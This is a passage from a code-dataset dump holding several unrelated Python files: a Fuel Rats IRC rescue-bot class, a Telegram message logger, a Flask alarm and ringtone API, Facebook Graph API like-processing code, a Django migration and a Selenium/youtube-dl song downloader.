\"\"\"\n if isinstance(value, Status):\n self._status = value\n else:\n raise TypeError\n\n @property\n def irc_nickname(self) -> str:\n \"\"\"\n The client's irc nickname\n\n Returns:\n str : nickname\n \"\"\"\n return self._irc_nick\n\n @irc_nickname.setter\n def irc_nickname(self, value: str) -> None:\n \"\"\"\n Sets the client's irc nickname\n\n Args:\n value (str): new nickname\n\n Raises:\n TypeError : value was not a string.\n \"\"\"\n if isinstance(value, str):\n self._irc_nick = value\n else:\n raise TypeError\n\n @property\n def lang_id(self) -> str:\n \"\"\"\n The language ID the client reported upon entering\n Returns:\n str: clients language ID\n \"\"\"\n return self._lang_id\n\n @lang_id.setter\n def lang_id(self, value) -> None:\n \"\"\"\n Sets the client's language\n\n Args:\n value (str): new lagnuage code\n \"\"\"\n if isinstance(value, str):\n self._lang_id = value\n else:\n raise TypeError\n\n @property\n def platform(self):\n \"\"\"The Rescue's platform\"\"\"\n return self._platform\n\n @platform.setter\n def platform(self, value) -> None:\n \"\"\"\n Set the client's platform\n\n Args:\n value (Platforms): new platform\n \"\"\"\n if isinstance(value, Platforms):\n self._platform = value\n else:\n raise TypeError(f\"expected a Platforms, got type {type(value)}\")\n\n @property\n def first_limpet(self) -> UUID:\n \"\"\"\n The ratID of the rat that got the first limpet\n\n Returns:\n str : ratid\n \"\"\"\n return self._firstLimpet\n\n @first_limpet.setter\n def first_limpet(self, value: UUID) -> None:\n \"\"\"\n Set the value of the first limpet rat\n\n If the value is not a UUID, this method will attempt to coerce it into one.\n\n Args:\n value (UUID): rat id of the first-limpet rat.\n\n Returns:\n None\n\n Raises:\n ValueError: The value was not a UUID and could not be parsed into a valid one.\n \"\"\"\n if isinstance(value, UUID):\n self._firstLimpet = value\n else:\n # the value wasn't a uuid, but lets try and coerce it into one.\n try:\n # try parse\n guid = UUID(value)\n except (ValueError, AttributeError):\n # the attempt failed\n raise TypeError(f\"expected UUID, got type {type(value)}\")\n else:\n # the attempt succeeded, lets assign it.\n self._firstLimpet = guid\n\n @property\n def board_index(self) -> int or None:\n \"\"\"\n The position on the rescue board this rescue holds, if any.\n\n Returns:\n int: if the board is attached to a case, otherwise None\n \"\"\"\n return self._board_index\n\n @board_index.setter\n def 
board_index(self, value: int or None) -> None:\n        \"\"\"\n        Sets the Rescue's board index\n\n        Set to None if the rescue is not attached to the board.\n\n        Args:\n            value (int or None): index position\n\n        Returns:\n            None\n        \"\"\"\n        # negative board indexes should not be possible, right?\n        if isinstance(value, int) or value is None:\n            if value is None or value >= 0:\n                self._board_index = value\n            else:\n                raise ValueError(\"Value must be greater than or equal to zero,\"\n                                 \" or None.\")\n        else:\n            raise TypeError(f\"expected int or None, got {type(value)}\")\n\n    @property\n    def uuid(self) -> UUID:\n        \"\"\"\n        The API Id of the rescue.\n\n        Returns: API id\n\n        \"\"\"\n\n        return self._api_id\n\n    @uuid.setter\n    def uuid(self, value: UUID) -> None:\n        \"\"\"\n        Sets the API uuid associated with the Rescue\n\n        Args:\n            value (UUID): The API ID\n\n        Returns:\n            None\n        \"\"\"\n        if isinstance(value, UUID):\n            self._api_id = value\n        else:\n            raise ValueError(f\"expected UUID, got type {type(value)}\")\n\n    @property\n    def client(self) -> str:\n        \"\"\"\n        The client associated with the rescue\n\n        Returns:\n            (str) the client\n\n        \"\"\"\n        return self._client\n\n    @client.setter\n    def client(self, value: str) -> None:\n        \"\"\"\n        Sets the client's Commander Name associated with the rescue\n\n        Args:\n            value (str): Commander name of the client\n\n        Returns:\n            None\n        \"\"\"\n        self._client = value\n\n    @property\n    def created_at(self) -> datetime:\n        \"\"\"\n        Case creation time.\n\n        Notes\n            this property is **READONLY**.\n\n\n            It can only be set during Rescue object creation\n\n        Returns:\n            datetime: creation date\n        \"\"\"\n        return self._createdAt\n\n    @property\n    def system(self) -> Optional[str]:\n        \"\"\"\n        The clients system name\n\n        Returns:\n            str: the clients system name\n        \"\"\"\n        return self._system\n\n    @system.setter\n    def system(self, value: Optional[str]):\n        \"\"\"\n        Sets the system property to the upper case of `value`\n\n        Raises:\n            AssertionError: if `value` is neither None nor a string\n\n        Args:\n            value (str): string to set `self.system` to\n\n        Returns:\n            None\n\n        Notes:\n            this method will cast `value` to upper case, as to comply with\n            Fuelrats Api v2.1\n        \"\"\"\n\n        assert value is None or isinstance(value, str)\n\n        if value is None:\n            # System must be nullable, so we specifically check for it\n            self._system = value\n        else:\n            # for API v2.1 compatibility reasons we cast to upper case\n            self._system = value.upper()\n\n    @property\n    def active(self) -> bool:\n        \"\"\"\n        marker indicating whether a case is active or not. 
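(An inactive rescue still counts as open; only Status.CLOSED closes it.) 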
this has no direct\n        effect on bot functionality, rather its primary function is case\n        management.\n\n        Returns:\n            bool: Active state\n        \"\"\"\n        return self.status != Status.INACTIVE\n\n    @active.setter\n    def active(self, value: bool) -> None:\n        \"\"\"\n        setter for `Rescue.active`\n\n        Args:\n            value (bool): state to set `active` to.\n\n        Returns:\n            None\n        \"\"\"\n        if isinstance(value, bool):\n            if value:\n                self.status = Status.OPEN\n            else:\n                self.status = Status.INACTIVE\n        else:\n            raise ValueError(f\"expected bool, got type {type(value)}\")\n\n    @property\n    def quotes(self) -> list:\n        \"\"\"\n        Contains all the quotes associated with this Rescue object.\n\n        Elements of the list are Quotation objects\n\n        Returns:\n            list: list of Quotation objects\n        \"\"\"\n        return self._quotes\n\n    @quotes.setter\n    def quotes(self, value) -> None:\n        \"\"\"\n        Sets the value of the quotes property to whatever `value` is.\n\n        This should not be set directly outside of case init, rather via\n        `add_quote`\n\n        Args:\n            value (list): list of Quotation objects\n\n        Returns:\n            None\n        \"\"\"\n        if isinstance(value, list):\n            self._quotes = value\n        else:\n            raise ValueError(f\"expected type list, got {type(value)}\")\n\n    def add_quote(self, message: str, author: str or None = None) -> None:\n        \"\"\"\n        Helper method, adds a `Quotation` object to the list.\n\n        Use this method to add a Quotation to the Rescue\n\n        Args:\n            message (str): Message to quote\n            author (str): IRC nickname of who is being quoted, if any.\n                Otherwise Defaults to Mecha.\n\n        Returns:\n            None\n        \"\"\"\n        if author:\n            # set the author of the quote\n            self.quotes.append(Quotation(author=author, message=message))\n        else:\n            # otherwise use default\n            self.quotes.append(Quotation(message=message))\n\n    @property\n    def updated_at(self):\n        \"\"\"\n        Last time the rescue object was changed\n\n        Returns:\n            datetime\n        \"\"\"\n\n        return self._updatedAt\n\n    @updated_at.setter\n    def updated_at(self, value):\n        \"\"\"\n        Updates `Rescue.updated_at` property\n\n        Args:\n            value (datetime): new last modified datetime\n\n        Raises:\n            TypeError: invalid `value` type.\n            ValueError: `value` is earlier than creation date.\n\n        Returns:\n\n        \"\"\"\n        if not isinstance(value, datetime):\n            raise TypeError(f\"Expected datetime, got {type(value)}\")\n        elif value < self.created_at:\n            raise ValueError(f\"{value} is older than the cases creation date!\")\n        else:\n            self._updatedAt = value\n\n    @property\n    def unidentified_rats(self) -> List[str]:\n        \"\"\"\n        List of unidentified rats by their IRC nicknames\n\n        Returns:\n            list: unidentified rats by IRC nickname\n        \"\"\"\n        return self._unidentified_rats\n\n    @unidentified_rats.setter\n    def unidentified_rats(self, value) -> None:\n        \"\"\"\n        Sets the value of unidentified_rats\n\n        Args:\n            value (list): list of strings\n\n        Raises:\n            ValueError: value contained illegal types\n            TypeError: value was of an illegal type\n\n        \"\"\"\n        if isinstance(value, list):\n            for name in value:\n                if not isinstance(name, str):\n                    raise ValueError(f\"Element '{name}' expected to be of type \"\n                                     f\"str, got {type(name)}\")\n            # replace the list rather than appending to the existing one\n            self._unidentified_rats = value\n        else:\n            raise TypeError(f\"expected type list, got {type(value)}\")\n\n    @property\n    def open(self) -> bool:\n        \"\"\"\n        Helper method for determining if a case is considered open or not\n\n        Returns:\n            bool: is case open?\n\n        \"\"\"\n        return self.status is not Status.CLOSED\n\n    @open.setter\n    def open(self, value: bool) -> None:\n        \"\"\"\n        helper method for setting the Rescue's open status\n\n        Args:\n            
value (bool): value to set\n\n        Returns:\n            None\n\n        Raises:\n            TypeError: value was not a boolean\n        \"\"\"\n        if isinstance(value, bool):\n            if value:\n                self.status = Status.OPEN\n            else:\n                self.status = Status.CLOSED\n        else:\n            raise TypeError(f\"expected type bool, got {type(value)}\")\n\n    @property\n    def epic(self) -> List[Epic]:\n        \"\"\"\n        Epic status of the rescue.\n\n        Returns:\n            List[Epic]\n\n        Notes:\n            This property is **READ ONLY** (for now)\n        \"\"\"\n        return self._epic\n\n    @property\n    def code_red(self) -> bool:\n        \"\"\"\n        Code Red status for the Rescue\n\n        Returns:\n            bool\n        \"\"\"\n        return self._codeRed\n\n    @code_red.setter\n    def code_red(self, value: bool):\n        if isinstance(value, bool):\n            self._codeRed = value\n        else:\n            raise TypeError(f\"expected type bool, got {type(value)}\")\n\n    @property\n    def outcome(self) -> None:\n        \"\"\"\n        Success status for Rescue.\n\n        Returns:\n            None: not currently tracked, reserved for future use\n        \"\"\"\n        return self._outcome\n\n    @property\n    def title(self) -> str or None:\n        \"\"\"\n        The rescues operation title, if any\n\n        Returns:\n            str: operation name if set\n\n            None: no name set.\n        \"\"\"\n        return self._title\n\n    @title.setter\n    def title(self, value: str or None) -> None:\n        \"\"\"\n        Set the operations title.\n\n        Args:\n            value (str or None): Operation name.\n\n        Returns:\n            None\n\n        Raises:\n            TypeError: bad value type\n        \"\"\"\n        if value is None or isinstance(value, str):\n            self._title = value\n        else:\n            raise TypeError(f\"expected type None or str, got {type(value)}\")\n\n    @property\n    def marked_for_deletion(self) -> MarkForDeletion:\n        \"\"\"\n        Mark for deletion object as used by the API\n\n        Returns:\n            MarkForDeletion\n        \"\"\"\n        return self._mark_for_deletion\n\n    @marked_for_deletion.setter\n    def marked_for_deletion(self, value) -> None:\n        \"\"\"\n        Sets the Md object\n\n        Args:\n            value (MarkForDeletion): value to set the MD object to.\n\n        Returns:\n            None\n\n        Raises:\n            TypeError: bad value type\n        \"\"\"\n        if isinstance(value, MarkForDeletion):\n            self._mark_for_deletion = value\n        else:\n            raise TypeError(f\"got {type(value)} expected MarkForDeletion object\")\n\n    @property\n    def rats(self) -> List[Rat]:\n        \"\"\"\n        Identified rats assigned to rescue\n\n        Returns:\n            list: identified rats by UUID\n        \"\"\"\n        return self._rats\n\n    @rats.setter\n    def rats(self, value):\n        \"\"\"\n        Sets the rats property directly, it is recommended to use the helper\n        methods to add/remove rats.\n\n        Args:\n            value (list): new value for `rats`\n\n        Returns:\n\n        \"\"\"\n        if isinstance(value, list):\n            self._rats = value\n\n        else:\n            raise TypeError(f\"expected type list got {type(value)}\")\n\n    async def add_rat(self,\n                      name: str = None,\n                      guid: UUID or str = None,\n                      rat: Rat = None) -> Optional[Rat]:\n        \"\"\"\n        Adds a rat to the rescue. 
This method should be run inside a `try` block, as failures will\n        be raised as exceptions.\n\n        this method will attempt to coerce `guid:str` into a UUID and may fail in\n        spectacular fashion\n\n        Args:\n            rat (Rat): Existing Rat object to assign.\n            name (str): name of a rat to add\n            guid (UUID or str): api uuid of the rat, used if the rat is not found in the cache\n                - if this is a string it will be type coerced into a UUID\n        Returns:\n            Rat: the added rat object\n\n        Raises:\n            ValueError: guid was of type `str` and could not be coerced.\n            ValueError: Attempted to assign a Rat that does not have a UUID.\n        \"\"\"\n        assigned_rat: Optional[Rat] = None\n\n        if isinstance(rat, Rat):\n            # we already have a rat object, lets verify it has an ID and assign it.\n            if rat.uuid is not None:\n                self.rats.append(rat)\n                assigned_rat = rat\n            else:\n                raise ValueError(\"Assigned rat does not have a known API ID\")\n\n        elif isinstance(name, str):\n            # lets check if we already have this rat in the cache (platform, any)\n            found = (await RatCache().get_rat_by_name(name, self.platform),\n                     await RatCache().get_rat_by_name(name))\n            if found[0]:\n                self.rats.append(found[0])\n                assigned_rat = found[0]\n            elif found[1]:\n                # a generic match (not platform specific) was found\n                # TODO throw a warning so the invoking method can handle this condition\n                log.warning(\"A match was found, but it was not the right platform!\")\n                self.rats.append(found[1])\n                assigned_rat = found[1]\n\n            else:\n                # lets make a new Rat!\n                # if self.rat_board:  # PRAGMA: NOCOVER\n                #     pass  # TODO fetch rat from API\n                # TODO: fetch rats from API handler, use that data to make a new Rat instance\n\n                rat = Rat(name=name, uuid=guid)\n                self.rats.append(rat)\n                assigned_rat = rat\n\n        elif guid is not None:\n            if isinstance(guid, str):\n                # attempt to coerce into a UUID\n                parsed_guid = UUID(guid)\n            elif isinstance(guid, UUID):\n                parsed_guid = guid\n            else:\n                raise ValueError(f\"Expected str/UUID, got {type(guid)}\")\n\n            # lets check if we already have this rat in the cache\n            found = await RatCache().get_rat_by_uuid(parsed_guid)\n            if found:\n                self.rats.append(found)\n                assigned_rat = found\n            else:\n                pass  # TODO: placeholder for fetching rats from the API handler\n\n        return assigned_rat\n\n    def mark_delete(self, reporter: str, reason: str) -> None:\n        \"\"\"\n        Marks a rescue for deletion\n\n        Args:\n            reporter (str): person marking rescue as deleted\n            reason (str): reason for the rescue being marked as deleted.\n\n        Raises:\n            TypeError: invalid params\n        \"\"\"\n        # type enforcement\n        if not isinstance(reporter, str) or not isinstance(reason, str):\n            raise TypeError(f\"reporter and/or reason of invalid type. got {type(reporter)},\"\n                            f\"{type(reason)}\")\n        if reason == \"\":\n            raise ValueError(\"Reason required.\")\n\n        log.debug(f\"marking rescue @{self.uuid} for deletion. reporter is {reporter} and \"\n                  f\"their reason is '{reason}'.\")\n        self.marked_for_deletion.reporter = reporter\n        self.marked_for_deletion.reason = reason\n        self.marked_for_deletion.marked = True\n\n    def unmark_delete(self) -> None:\n        \"\"\"\n        helper method for unmarking a rescue for deletion. 
resets the Md object\n        \"\"\"\n\n        self.marked_for_deletion.marked = False\n        self.marked_for_deletion.reason = None\n        self.marked_for_deletion.reporter = None\n\n    @contextmanager\n    def change(self):\n        \"\"\"\n        Convenience method for making safe attribute changes.\n\n        FIXME: currently just ensures rescue.updated_at is updated.\n\n        TODO: replace with Board context manager once its implemented\n\n        TODO: replace current context manager with a dummy once the Board\n            context manager is a thing.\n\n        TODO: implement API integration (probably in the board Contextmanager\n\n        Returns:\n            contextManager\n\n\n        Examples:\n            ```\n\n            with rescue.change():\n                rescue.client = foo\n\n            ```\n        \"\"\"\n        yield\n        self.updated_at = datetime.utcnow()\n\n    # TODO: to/from json\n    # TODO: track changes\n    # TODO: helper method for adding / editing quotes\n","sub_path":"Modules/rat_rescue.py","file_name":"rat_rescue.py","file_ext":"py","file_size_in_byte":25803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"21821196","text":"__author__ = '@DingChen-Tsai'\n\nimport sys\nimport time\nimport pprint\nimport telepot\nimport datetime\nfrom configparser import SafeConfigParser\n\n# define the telegram message handler\ndef handle(msg):\n\t#pprint.pprint(msg)\n\tcontent_type, chat_type, chat_id = telepot.glance(msg)\n\tchat_id = msg['chat']['id']\n\tmessage_id = msg['message_id']\n\tuser_id = msg['from']['id']\n\ttry:\n\t\tusername = msg['from']['first_name'] +' '+ msg['from']['last_name']\n\texcept KeyError:\n\t\tusername = msg['from']['first_name']\n\n\t# respond to incoming text messages\n\tif content_type == 'text':\n\t\tsay = msg['text']\n\t\tcommand = msg['text'].lower()\n\t\tcontent = '%s(%d) says: %s' % (username,user_id,say)\n\t\tif command.startswith(\"/start\"):\n\t\t\tbot.sendMessage(chat_id, 'RRRRR')\n\t# on photos, log the photo file_id\n\telif content_type == 'photo':\n\t\t\t# pick the file_id of the original (largest) photo size\n\t\t\ta = msg['photo']\n\t\t\tmax = 0\n\t\t\tfor i in range(1,len(a)):\n\t\t\t\tif a[i]['width'] > a[max]['width']:\n\t\t\t\t\tmax = i\n\t\t\tmax_file_id = a[max]['file_id']\n\t\t\tcontent = '%s(%d) sent a photo:\\\\n%s' % (username,user_id,max_file_id)\n\t# stickers\n\telif content_type == 'sticker':\n\t\tcontent = '%s(%d) sent a sticker:\\\\n%s' % (username,user_id,msg['sticker']['file_id'])\n\t# documents\n\telif content_type == 'document':\n\t\tcontent = '%s(%d) sent a file:\\\\n%s\\\\n%s' % (username,user_id,msg['document']['file_name'],msg['document']['file_id'])\n\t# locations\n\telif content_type == 'location':\n\t\tcontent = '%s(%d) sent a location:\\\\n%f,%f' % (username,user_id,msg['location']['latitude'],msg['location']['longitude'])\n\t# voice messages\n\telif content_type == 'voice':\n\t\tcontent = '%s(%d) sent a voice message:\\\\n%s' % (username,user_id,msg['voice']['file_id'])\n\t# any other type, so `content` is always defined below\n\telse:\n\t\tcontent = '%s(%d) sent a %s message' % (username,user_id,content_type)\n\n\t# build the log entry\n\tlog = '[%s] %s\\\\n' % (time.strftime(\"%Y-%m-%d %I:%M:%S\"),content)\n\t# append it to the log file\n\twith open('log.txt', 'a') as f:\n\t\tf.write(log)\n\tprint (log)\n\n# login credentials\nparser = SafeConfigParser()\nparser.read('apitoken.txt')\nowner = parser.get('apitoken','owner')\nbot_apitoken = parser.get('apitoken', 'token')\nbot = telepot.Bot(bot_apitoken)\nbot.sendMessage(int(owner),'Up and running!')\nbot.message_loop(handle)\nprint ('Listening ...')\n\nwhile 1:\n\ttime.sleep(10)\n","sub_path":"python3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"533090528","text":"import os\nfrom datetime import datetime\nfrom flask import request, current_app, jsonify\nfrom werkzeug.datastructures import FileStorage\nfrom app import db\nfrom . 
import alarm\nfrom app.models import Alarm, Ring\nimport shutil\nfrom .kit import split_ring, set_alarm\nfrom concurrent.futures import ThreadPoolExecutor\n\n@alarm.route('/newAlarm', methods=['POST'])\ndef new_alarm():\n    user_id = 1\n    ring_id = 1\n    username = 'admin'\n    name = request.form.get('name')\n    alarm_time = request.form.get('time')\n    loop = request.form.get('loop', False)\n    loop = True if loop == 'True' else False\n    weeks = request.form.get('weeks', None)\n\n    if name and alarm_time:\n        a = Alarm()\n        a.name = name\n        a.alarm_time = alarm_time\n        a.loop = loop\n        a.weeks = weeks\n        a.user_id = user_id\n        a.ring_id = ring_id\n        db.session.add(a)\n        try:\n            db.session.commit()\n\n            path = os.path.join(current_app.config['RING_UPLOAD_DIR'], str(user_id) + '-' + username)\n            if not os.path.exists(path):\n                os.makedirs(path)\n            ring_path = Ring.query.filter_by(id=ring_id).first().split_path\n            set_alarm(path, ring_id, ring_path, alarm_time, loop, weeks)\n            return jsonify({'code':1})\n        except Exception as e:\n            print(e)\n            db.session.rollback()\n            return jsonify({'code': 0})\n    return jsonify({'code': 0})\n\n@alarm.route('/uploadRing', methods=['POST'])\ndef upload_ring():\n    user_id = 1\n    username = 'admin'\n    ring = request.files.get('ring')\n    # guard against a missing upload before touching ring.filename\n    if ring is None:\n        return jsonify({'code': 0})\n    filename = os.path.splitext(ring.filename)\n    if filename[-1] == '.mp3':\n\n        path = os.path.join(current_app.config['RING_UPLOAD_DIR'], str(user_id)+username)\n        if not os.path.exists(path):\n            os.makedirs(path)\n        full_path = os.path.join(path, ring.filename)\n        # the split file lives next to the original, not inside it\n        split_path = os.path.join(path, filename[0] + '_' + str(current_app.config['SPLIT_RING_TIME'])\n                                  + 's' + filename[-1])\n        if not os.path.exists(full_path):\n            with open(full_path, 'wb') as f:\n                ring.save(f)\n        else:\n            return jsonify({'code':0, 'msg':'the file has existed'})\n        # split_ring takes the source and destination paths as positional args;\n        # note the with-block waits for the split task to finish\n        with ThreadPoolExecutor(max_workers=20) as executor:\n            executor.submit(split_ring, full_path, split_path)\n\n        r = Ring()\n        r.full_name = filename[0]\n        r.full_path = full_path\n        r.split_path = split_path\n        r.user_id = user_id\n        r.create_time = datetime.now()\n        db.session.add(r)\n        try:\n            db.session.commit()\n            return jsonify({'code':1})\n        except Exception as e:\n            print(e)\n            db.session.rollback()\n            return jsonify({'code':0, 'msg':'write to database failed'})\n    return jsonify({'code':0})\n","sub_path":"app/alarm/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"284621722","text":"import text_analysis_freebase\nfrom datetime import datetime, timedelta\nimport re\nfrom recommender.models import User, Friend\n# from pymongo import MongoClient\n# from sentiment import analysis\nfrom facebook import GraphAPI\nimport youtubeAPI\n# from langid import classify\nfrom rating_calculation import *\n\n\ndef get_user_history(user):\n    my_movie_actions = []\n    token = user['token']\n    time_window = datetime.now() - timedelta(days=60)\n    graph = GraphAPI(token)\n    limit = 'limit(100)'\n    links_fields = 'fields(link, id, name, created_time)'\n    time_mod = 'since({0})'.format(str(time_window))\n    links = 'links.{0}.{1}.{2}'.format(time_mod, links_fields, limit)\n    video_sub = 'watches'\n    video_fields = 'fields(id, data, publish_time)'\n    video = 'video.{0}.{1}'.format(video_sub, video_fields)\n    fields = {'fields': 'name,{0},{1}'.format(links, video)}\n    my_wall = graph.get_object('me', **fields)\n\n    my_links = (my_wall['links']['data'] if 'links' in my_wall else {})\n    
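# NOTE: 'video.watches' only shows up when the token was granted the\n    # matching user_actions permission on the Graph API; otherwise the\n    # fallback below leaves my_movie_actions empty.\n    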
my_movie_actions = (my_wall['video.watches']['data']\n                        if 'video.watches' in my_wall else {})\n\n    # genre tallying for watched videos happens in process_videos_history;\n    # doing it inline here as well would double-count every title\n    process_links_history(my_links, user)\n    process_videos_history(my_movie_actions, user)\n    total_weight_of_user_movie_genres = sum(user['movie_genres'].values())\n    total_weight_of_user_music_genres = sum(user['music_genres'].values())\n\n    user['total_movie_score'] = total_weight_of_user_movie_genres\n    user['total_music_score'] = total_weight_of_user_music_genres\n    user['movie_likes_score'] = get_score_sum(user['movie_categories'],\n                                              user['movie_genres'])\n    user['music_likes_score'] = get_score_sum(user['music_categories'],\n                                              user['music_genres'])\n\n\ndef process_videos_history(my_movie_actions, user):\n    for video in my_movie_actions:\n        entity = {}\n        video_data = video['data']\n        user_movie_genres = user['movie_genres']\n        if 'movie' in video_data:\n            title = video_data['movie']['title']\n            post_id = video['id']\n            entity = text_analysis_freebase.search(title, \"movie\")\n            entity_genres = (entity['genres'] if 'genres' in entity else [])\n            for genre in entity_genres:\n                user_movie_genres[genre] = user_movie_genres.get(genre, 1) + 1\n            if title:\n                movie_categories = {}\n                movie_categories['like_name'] = entity['name']\n                movie_categories['fb_id'] = post_id\n                movie_categories['genres'] = entity_genres\n                user['movie_categories'].append(movie_categories)\n\n\ndef process_links_history(my_links, user):\n    for post in my_links:\n        tids = []\n        url = \"\"\n\n        title = (post['name'] if 'name' in post else '')\n        post_link = post['link']\n        post_id = post['id']\n\n        if any(element in post_link for element in ['youtube', 'youtu.be']):\n            tids, url = youtubeAPI.getEntity(post_link, title)\n        entity = {}\n\n        for tid in tids:\n            entity = text_analysis_freebase.link_search(tid, title)\n            if entity:\n                break\n        if entity and entity['type'] == 'movie' and entity['genres']:\n            entity_genres = entity['genres']\n            user_movie_genres = user['movie_genres']\n            for genre in entity['genres']:\n                user_movie_genres[genre] = user_movie_genres.get(genre, 1) + 1\n            movie_category = {}\n            movie_category['like_name'] = entity['name']\n            movie_category['fb_id'] = post_id\n            movie_category['genres'] = entity['genres']\n            user['movie_categories'].append(movie_category)\n        elif entity and entity['type'] == 'music' and entity['genres']:\n            entity_genres = entity['genres']\n            user_music_genres = user['music_genres']\n            for genre in entity_genres:\n                user_music_genres[genre] = user_music_genres.get(genre, 1) + 1\n            music_category = {}\n            music_category['like_name'] = entity['name']\n            music_category['fb_id'] = post_id\n            music_category['genres'] = entity['genres']\n            user['music_categories'].append(music_category)\n\n\ndef filter_likes(friend, token):\n    friend_movie_likes = []\n    friend_music_likes = []\n    graph = GraphAPI(token)\n    try:\n        music_fields = 'id,name,category,genre'\n        limit = 500\n        friend_likes = graph.get_object(friend['id'] + 
'/music',\n                                        fields=music_fields, limit=limit)\n    except Exception:\n        friend_likes = {'data': []}\n    friend_music_likes = []\n\n    for like in friend_likes['data']:\n        try:\n            like['name'].encode('ascii')\n        except (UnicodeDecodeError, UnicodeEncodeError):\n            continue\n        if 'Musician/band' in like['category']:\n            like_object = {}\n            like_object['id'] = like['id']\n            like_object['name'] = like['name'].encode('utf-8')\n            like_object['category'] = like['category']\n            friend_music_likes.append(like_object)\n    try:\n        music_fields = 'id,name,genre,category'\n        limit = 500\n        friend_likes = graph.get_object(friend['id'] + '/movies',\n                                        fields=music_fields, limit=limit)\n    except Exception:\n        friend_likes = {'data': []}\n    friend_movie_likes = []\n    for like in friend_likes['data']:\n        try:\n            like['name'].encode('ascii')\n        except (UnicodeDecodeError, UnicodeEncodeError):\n            continue\n        if 'Movie' in like['category'] and 'character' not in like['category']:\n            like_object = {}\n            like_object['id'] = like['id']\n            like_object['name'] = like['name'].encode('utf-8')\n            like_object['category'] = like['category']\n            friend_movie_likes.append(like_object)\n    return friend_movie_likes, friend_music_likes\n","sub_path":"common/entity_extraction/graph_api_processing.py","file_name":"graph_api_processing.py","file_ext":"py","file_size_in_byte":6987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"99336560","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('administration', '0009_auto_20150608_1133'),\n    ]\n\n    operations = [\n        migrations.AlterField(\n            model_name='receipt',\n            name='entry_starts_at',\n            field=models.CharField(help_text='The first entry has this number.', max_length=16, verbose_name='Entry starts at'),\n            preserve_default=True,\n        ),\n    ]\n","sub_path":"administration/migrations/0010_auto_20150608_2045.py","file_name":"0010_auto_20150608_2045.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"553840081","text":"#!/usr/bin/python3\n#-*- coding:utf-8 -*-\nfrom kivy.core.audio import SoundLoader\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time, os\n\nimport songBox_list as sbl\nimport songBox_singerlist as sbs\n\nbaseDir = os.getcwd()#os.path.abspath('py_song')# working folder\nmp3Dir = os.path.join(baseDir, \"songBox_list\")# song folder\nfontDir = os.path.join(baseDir, \"songBox_font\")# font folder\nimgDir = os.path.join(baseDir, \"songBox_img\")# image folder\ndataDir = os.path.join(mp3Dir, \"0_file_data\")# folder for the data-list csv files\nuserListDir = os.path.join(mp3Dir, \"1_dir_userlist\")# userlist folder\nsingerListDir = os.path.join(mp3Dir, \"2_dir_singerlist\")# singerlist folder\nttsDir = os.path.join(mp3Dir, \"3_tts\")# tts folder\nignoreFile = ['ffmpeg','youtube-dl.exe','.DS_Store','list_data','0_file_data','1_dir_userlist','2_dir_singerlist','3_tts']# files that must exist in the dir but are not mp3s\n\n#===============get chrome driver===============================================\ndef get_driver():\n    try:\n        driver = webdriver.Chrome(f'{baseDir}\\\\chromedriver')\n    except:\n        driver = webdriver.Chrome(f'{baseDir}\\\\chromedriver.exe')\n    return driver\n\n#===============used on song select - search, then save the mp3 into the list folder==============\n#===============class UpperMenu>def songBox_pressed (when the add button is clicked in the popup, thread)=\ndef change_Song(song, singer):\n    #song = input(\"song?\")\n    
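# Flow: search YouTube for '<song> <singer>', take the first result's video id,\n    # then hand the share URL to youtube-dl for a .wav download.\n    # Hypothetical usage from the GUI thread:\n    #   change_Song('Dynamite', 'BTS')  # returns a 'res:<code>' status string\n    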
os.chdir(f'{baseDir}')\n    myDriver = get_driver() # account for the OS\n    myDriver.get(f'https://www.youtube.com/results?search_query={song} {singer}')\n    #myDriver.find_element_by_id('img').click()\n    url = myDriver.find_element_by_xpath('//*[@id=\"video-title\"]')\n    urlAddress=url.get_attribute('href')\n    urlSplit=list(urlAddress.split(\"=\"))\n    songAddress=urlSplit[1]\n\n    shareAddress = f'https://youtu.be/{songAddress}'\n    shareAddressTwo = f'https://www.youtube.com/watch?v={songAddress}'\n    print(urlAddress,songAddress, shareAddress)\n    #youtube-dl -x --audio-format mp3 <video url> or <playlist url>\n    #youtube-dl -x --audio-format mp3 https://youtu.be/75fEhQlc9h4\n\n    #===============attempt the download==================================================\n    try:\n        os.chdir(f'{mp3Dir}')\n        beforeDown = os.listdir(f'{mp3Dir}')\n        res = os.system(f'youtube-dl -x --audio-format wav {shareAddress}')\n\n        print(f\"1 try:{res}\")\n        time.sleep(3)\n        if res != 0:\n            res = os.system(f'youtube-dl -x --audio-format wav {shareAddressTwo}')\n            print(f\"2 try:{res}\")\n\n        afterDown = os.listdir(f'{mp3Dir}')\n\n        #===============after the download: rename the file and sync the lists=============================\n        for i in os.listdir(f'{mp3Dir}'):\n            if i not in beforeDown:\n                os.rename(i, f'{song}_{singer}.wav')\n                # sb_sql.down_song(song, singer, filetype)  # save to mysql (sb_sql/filetype are not defined in this module)\n                sbl.sync_song() #song\n                sbs.make_singerDic() #singer\n\n        time.sleep(20)\n\n        os.chdir(f'{baseDir}')\n        myDriver.quit()\n        myDriver.close()\n        return f\"res:{res}\" # res != 0 means the download failed\n\n    #===============try/except: the download attempt itself raised=================================\n    except Exception as msg:\n        os.chdir(f'{baseDir}')\n        myDriver.quit()\n        myDriver.close()\n        return f\"error:{msg}\"\n","sub_path":"WIN/youtb_converterWAV.py","file_name":"youtb_converterWAV.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
